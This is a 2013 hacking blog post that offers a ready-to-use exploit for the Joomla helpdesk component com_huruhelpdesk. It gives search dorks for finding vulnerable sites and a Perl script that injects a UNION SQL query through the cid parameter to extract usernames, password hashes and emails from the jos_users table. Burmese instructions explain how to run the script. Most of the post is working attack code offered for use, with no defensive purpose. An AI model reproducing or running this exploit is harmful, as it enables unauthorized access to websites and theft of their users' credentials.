Thursday, 31 January 2013

exploit [joomla] com_huruhelpdesk

05:40  , , , ,  No comments


Code:
Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"author :  devil-zone.net
greet is to : devil-zone.net  all members 
vel = sqlI
Code:
#!/usr/bin/perl
#greet is to Evil-Dzsystem("clear");
print "***************************************\n";
print "         Good Luck & Hafe Fun         *\n";
print "       Coded by devil-zone forum      *\n"; 
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: HosT] --> ";chomp(my $target=<STDIN> );$column_name="concat(username,0x3a,password,0x3a,mail)";$table_name="jos_users";$prm="-1/**/union/**/select/**/";$start= LWP::UserAgent->new() or die "[!] Error while processing";$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";$ok= $start->request(HTTP::Request->new(GET=>$website));$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";sleep 1;
}
else
{
print "No password found :(\n";
}
credit : devil-zone

Code:
- dork နဲ ့ရွာ 
- perl code ေတြကို xxx.pl နဲ ့ desktop မွာ save
- cmd ဖြင့္
- cd desktop
- perl xxx.pl
Copy From >>. . >>BiG BOSS ( MHu - Team )

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)